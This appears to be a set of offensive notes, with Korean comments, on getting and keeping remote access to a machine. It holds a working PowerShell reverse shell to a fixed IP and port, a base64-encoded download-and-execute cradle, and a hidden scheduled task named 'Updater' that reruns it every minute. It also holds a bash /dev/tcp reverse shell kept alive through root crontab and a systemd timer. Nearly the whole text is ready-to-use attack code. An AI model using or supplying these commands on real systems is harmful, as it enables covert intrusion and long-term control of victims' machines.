Task Scheduler

# reverse_shell.ps1 파일
$client = New-Object System.Net.Sockets.TCPClient("192.168.79.130", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();

$str = 'IEX ((new-object net.webclient).downloadstring("http://example.com/Reverse.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
<-- Base64로 인코딩된 명령어 출력 -->

$TaskName = "Updater"
$PSEXE = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$EncodedArgs = "-nop -w hidden -enc <Base64 Encoded Command>"
$Action = New-ScheduledTaskAction -Execute $PSEXE -Argument $EncodedArgs
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
$Principal = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal

# 리버스 쉘 코드 입력 및 권한부여
echo - e '#!/bin/bash\nsh -i >& /dev/tcp/<Attacker IP>/<Attacker Port> 0>&1' > rev.sh
chmod +x rev.sh

# 크론 스케줄러에 등록
echo '* * * * * root <PATH>' >> /etc/crontab

# 크론 스케줄이 정상적으로 실행되는지 확인
tail -f /var/log/syslog | grep CRON

# Systemd 파일에 서비스 등록 및 권한 부여
echo -e '[Service]\nExecStart=/bin/bash <PATH>' > /etc/systemd/system/rev.service
chmod +x rev.sh

# 시스템을 실행하는 주기를 매분 00초로 설정
echo -e '[Timer]\nOnCalendar=*-*-* *:*:00\nPersistent=true\n[Install]\nWantedBy=timers.target' > /etc/systemd/system/rev.timer

# 데몬 재기동 및 타이머 활성화
systemctl daemon-reload
systemctl enable --now rev.timer

# 등록된 타이머 리스트로 확인
systemctl list-timers